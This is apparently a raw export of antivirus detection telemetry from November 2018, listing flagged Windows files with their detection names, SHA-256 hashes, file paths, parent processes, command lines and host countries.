  Row(detection=Row(filename='filezilla_server-0_9_50.exe', filepath='\\\\WDMYCLOUDMIRR16\\Public\\Acer17Zoll C Heidrun und Jochen FreeFileSync\\Downloads\\FileZilla_Server-0_9_50.exe', filesize=772000, name='HEUR/AGEN.1018746.#M1.#R1'), hash='a50edeec8122526dae3e5a51b01782d5fede7af6650564b7c01c0c5da9309769', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\FreeFileSync\\Bin\\FreeFileSync_x64.exe', parentsize=5850808, timestamp='2018-11-04T14:09:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='unrar.exe', filepath='C:\\Program Files (x86)\\WinRAR\\UnRAR.exe', filesize=256000, name='W32/Ramnit.CD.#M1.#R1'), hash='51f05e67de195aa9ccfb154716f37be3014d31144102385acbb2c70fb51b0404', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:oL23CjqHnky4RGdq.1', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T16:36:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=18594760, timestamp='2018-11-04T16:48:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='miner-nofee.exe', filepath='C:\\Users\\X\\Desktop\\zec-miner-nofee_win.0.3.4b\\miner-nofee.exe', filesize=320000, name='HEUR/AGEN.1017423.#M1.#R1'), hash='0487114a1df2852b2f3ba69aaa49930055e04c81ffc1e68dad6b47bec7ba2faa', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T01:07:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='unrardll.dll', filepath='C:\\KMPlayer\\unrarDLL.dll', filesize=256000, name='W32/Ramnit.CD.#M1.#R1'), hash='09f43eb71fb2e60a8097c22d16a03eaad057fb86b118d5ebc373d7463990f566', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1426264, timestamp='2018-11-04T02:48:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='بولنج.exe', filepath='I:\\ألعاب\\Games 1\\بولنج\\بولنج.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='71b3716790f24005c718fe95ca3d648c80c4a4af6d9ddc9a4a0ced9ef91a9f7c', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-041256-495c57eb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-041256-495C57EB', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='c832ed6b008734995ebe31a3cf48e229e9d40a3cdeaf74e8e319c47e4f7a251c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:14:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-221544-61578a99', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221342-4F0362B5\\AVSCAN-20181102-221544-61578A99', filesize=64000, name='TR/Siggen.64000.1.#M1.#R1'), hash='bff6eb442a00089abb08a519e3dc447241e8a0d37685002cf8a6c6f62e9fc6a1', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:15:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='servicemodelreg.exe', filepath='F:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelReg.exe', filesize=312000, name='W32/Neshta.A.#M1.#R1'), hash='d9d622d75c3f7e212b633ad7edfffbc0716204f030f342eb9b11cdeaf8923492', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1965136, timestamp='2018-11-02T03:34:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='winzip20-new.exe', filepath='C:\\Users\\X\\Downloads\\winzip20-new.exe', filesize=1544000, name='PUA/InstallCore.Gen.#M300.#R8158'), hash='784442b0abd7bc2e8631f77f23ec2339c361e13e76ddce549c2e3ee0862c474f', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T16:49:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-092940-b477d902', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4eb83323\\AVSCAN-20181102-092919-B13DF2EC\\AVSCAN-20181102-092940-B477D902', filesize=216000, name='X2000M/Agent.03377832.#M1.#R1'), hash='c52be89ae90b960543b102a1c17cfbb7ab10e25d2cbbe7d6e33ba51f48175b19', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:29:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Users\\X\\Desktop\\small games\\SETUP.EXE', filesize=64000, name='TR/Patched.Ren.Gen.#M300.#R460'), hash='fb762b74afc0948d6f20f1b9dd56d3f1f49a53774fe9426d17e79e014be53fd4', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:UIFDT+i0006MVGf2.1', country='ZA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=126264, timestamp='2018-11-02T06:18:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vcredist_x86.exe', filepath='D:\\PLAQUINHAS DIVERTIDAS\\PROGRAMAS\\COREL X8\\CorelDraw Graphics Suite X8 Multilanguage 32 e 64 Bits\\CorelDRAW X8 32 e 64\\x64\\Redist\\VC\\vcredist_x86.exe', filesize=384000, name='W32/Stanit.#M1.#R1'), hash='b3aa91b8a34ce2c8173512d0d09d7c4429849008c80b7ffbdbcda38ecbaf4cf9', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='efa965f2baeb3f464e8b2f65e73aed14a0df6ec806b20dc1be4cfe715f8528e2', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-30\\EFA965F2BAEB3F464E8B2F65E73AED14A0DF6EC806B20DC1BE4CFE715F8528E2', filesize=1280000, name='HEUR/AGEN.1029502.#M1.#R1'), hash='efa965f2baeb3f464e8b2f65e73aed14a0df6ec806b20dc1be4cfe715f8528e2', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-30.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-3.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-27.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-28.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-29.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:09:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='7857b1fdd07be22713ae84a60b37f18db77566c11233ad0cd2c2e3501375a8d6.mrg', filepath='D:\\TotalAutomation\\CategorizationLayer\\21.12.2017-141.available\\Avira\\Others\\PE-detected-Avira\\HEUR.AGEN.1001135\\7857b1fdd07be22713ae84a60b37f18db77566c11233ad0cd2c2e3501375a8d6.MRG', filesize=2560000, name='HEUR/AGEN.1001135.#M1.#R1'), hash='7857b1fdd07be22713ae84a60b37f18db77566c11233ad0cd2c2e3501375a8d6', metadata=Row(cmdline='D:\\\\\\\\TotalAutomation\\\\\\\\CategorizationLayer\\\\\\\\23.01.2018-48.available\\\\\\\\Avira\\\\\\\\Others\\\\\\\\PE-detected-Avira -PERHASH', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\TotalAutomation\\Dependencies\\Buf\\WWPERHASH.exe', parentsize=1842176, timestamp='2018-11-02T16:09:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gj.exe', filepath='c:\\users\\X\\appdata\\roaming\\gj.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='GB', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T17:45:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='lxlfkncw.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\LXlFKncW.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:06:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-211053-c4b531c3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2eb1b43c\\AVSCAN-20181102-210813-AE62A200\\AVSCAN-20181102-211053-C4B531C3', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T20:10:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='afuwin.exe', filepath='E:\\Program Files\\ASUS\\AI Suite II\\MyLogo\\PEUpdater\\Compal\\32\\afuwin.exe', filesize=336000, name='W32/Sality.AT.#M1.#R1'), hash='ea4aeccdcfd216a6f5343a6f947c3faeb98fa59b2b66c8cf814f0b2b8c87e0eb', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:30:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-095425-339dbb83', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_98a83c06\\AVSCAN-20181102-095059-148C2F4B\\AVSCAN-20181102-095425-339DBB83', filesize=128000, name='HEUR/Macro.Downloader.ZAP.Gen.#M1.#R1'), hash='72fb1b1fdf6460845b84b6d8140470ec90b16929bcc160bb4c3e836bac9ee404', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:54:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='spider-man setup.exe', filepath='D:\\Spider Man\\Spider-Man Setup.exe', filesize=128000, name='W32/Neshta.A.#M1.#R1'), hash='fc7ac4d8fab824499d4ba70077263fbc8f7a157076cb8363a05ee9eb855dce11', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-02T17:02:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ukwxpjvd.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\UKWXPJvD.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:07:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ultraiso.exe', filepath='E:\\HBCD\\Programs\\UltraISO.exe', filesize=64000, name='TR/Siggen.rcdir.#M1.#R1'), hash='fbad3124805b2597f2a57f33dbe90c81b6c12fb510ccbdfc98331a92fe9cf52e', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T07:21:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-094056-e742ee87', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-094056-E742EE87', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='c364b5f31a3373443bd737abb4764e6c7955a749855a497937a97c9e5f49d65e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:42:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='9b37cb2cf2da005513bb4a073cc0e715d7f2bb286ccadff0bdd82bb523b83294', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\9B37CB2CF2DA005513BB4A073CC0E715D7F2BB286CCADFF0BDD82BB523B83294', filesize=1856000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='9b37cb2cf2da005513bb4a073cc0e715d7f2bb286ccadff0bdd82bb523b83294', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:11:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1061f5b34b7b3f88bd7b347445ee9bc4', filepath='e:\\sample\\20181102_sample\\1061F5B34B7B3F88BD7B347445EE9BC4', filesize=960000, name='TR/Dropper.VB.8b2d71.#M1.#R1'), hash='8b2d71281a293ebf87d0053ecd317cdfd2e47d581835d8d2722aae71c9698330', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:23:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='f51ac410529b2caa096c5a264e9af75f2814ca8189e9030e3a08dda14e9af190', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-19\\F51AC410529B2CAA096C5A264E9AF75F2814CA8189E9030E3A08DDA14E9AF190', filesize=2048000, name='TR/Crypt.XPACK.Gen7.#M300.#R601544'), hash='f51ac410529b2caa096c5a264e9af75f2814ca8189e9030e3a08dda14e9af190', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:06:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0003017.exe', filepath='d:\\system volume information\\_restore{0933709f-2f26-45ee-a2b3-7188a29923dd}\\rp1\\A0003017.exe', filesize=448000, name='W32/Virut.Gen.#M1.#R1'), hash='dd720dda0dbff57b0fcb744e743361c0331738c2380eba187d3bec802f226dfc', metadata=Row(cmdline=None, country='BD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:31:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='instmsiw.exe', filepath='D:\\Scan\\wulan1\\BACKUP\\BMD Street\\hysys 7.3\\aspenONEV7.3dvd1\\administration\\AFW\\afwv73\\Aspen Framework\\instmsiw.exe', filesize=1856000, name='W32/Small.L.#M1.#R1'), hash='931be25e2088d968b714c587ff245486b4eade3d6df13be9cfc113cdf72ad7fc', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe803_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe803 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T02:45:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='dc86dd6c1b8d4af8cb1d2d250a3c78d9d21d5314f73bd753e4778c47942c098f', metadata=Row(cmdline='\\\\\\/Embedding', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-02T09:19:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='smboottime.exe', filepath='C:\\Program Files (x86)\\IObit\\Advanced SystemCare\\smBootTime.exe', filesize=1268000, name='TR/Decep.IObit.EN.#M1.#R1'), hash='edc30c30be7b2a18716ee90d8954541b53f3074a74648754f633cbe877554579', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:43:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-101732-8a397154', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2d3db38b\\AVSCAN-20181102-101715-87D3D321\\AVSCAN-20181102-101732-8A397154', filesize=64000, name='TR/Agent.64000.186.#M1.#R1'), hash='eb90c5e7b45131be3382699058912c5f84fa35c868f1202c3acd1ca54cb65080', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T03:17:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='fa6e7db03e0897a7c31cb5ce183262b6292d6611d8129e81eb107da782b52633', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T17:02:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-230551-d915451f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_394e3c36\\AVSCAN-20181102-230350-C43A23EB\\AVSCAN-20181102-230551-D915451F', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:36:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=0, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:56:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bb650a5ed03e5b44053141b581ad653bc3fb3b260c5d9c3f008c049d69b056c4.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-19.available\\Avira\\BB650A5ED03E5B44053141B581AD653BC3FB3B260C5D9C3F008C049D69B056C4.VIR', filesize=1856000, name='HEUR/AGEN.1029502.#M1.#R1'), hash='bb650a5ed03e5b44053141b581ad653bc3fb3b260c5d9c3f008c049d69b056c4', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T05:55:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autmata..exe', filepath='C:\\Users\\X\\Downloads\\descargas\\Autmata..exe', filesize=476000, name='HEUR/AGEN.1014028.#M1.#R1'), hash='cca939933535d17781df181347898638c06e7c8e4685e338b955b65c93437cc6', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T18:44:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023a857', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023a857', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:00:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-190857-783b5f20', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1065741a\\AVSCAN-20181104-190059-409DD963\\AVSCAN-20181104-190857-783B5F20', filesize=20000, name='PUA/Linkury.#M1.#R1'), hash='d0fb80dc224c4d0d9db5dad3414c4cdb8b685c69825d7c88991020c38ecb718d', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T22:07:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00297250', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00297250', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:41:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0029755a', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp0029755a', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:46:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00291f91', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00291f91', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:02:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00237fea', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00237fea', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:16:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='f515e2f31bf3fef5121beb134c8fabdaa917ec78caf029e4fcb9faec68ee1d2f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\F515E2F31BF3FEF5121BEB134C8FABDAA917EC78CAF029E4FCB9FAEC68EE1D2F', filesize=148000, name='TR/Crypt.ZPACK.Gen7.#M300.#R600521'), hash='f515e2f31bf3fef5121beb134c8fabdaa917ec78caf029e4fcb9faec68ee1d2f', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:43:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='digitalrescue4premium.exe', filepath='\\\\10.255.111.86\\d$\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\DigitalRescue4Premium.exe', filesize=64000, name='BDS/Rogue.766077.#M1.#R1'), hash='be37e8db54be4ab3f6336804357cd17c9b97e65cdb98cb4242bf352aa9ca0f8d', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-04T06:22:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='d957b4ff0646abd39096b7b3b7f7431ca47fc4e84421eb2e8664afee59485aa7', metadata=Row(cmdline='\\\\\\/Embedding', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-04T23:58:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='clipgrab-3.6.8-cgorg.exe', filepath='F:\\Users\\X\\Downloads\\clipgrab-3.6.8-cgorg.exe', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:gYCjRXqp+ECUtcAR.1', country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T18:38:56Z'), dt=datetime.date(2018, 11, 4)),
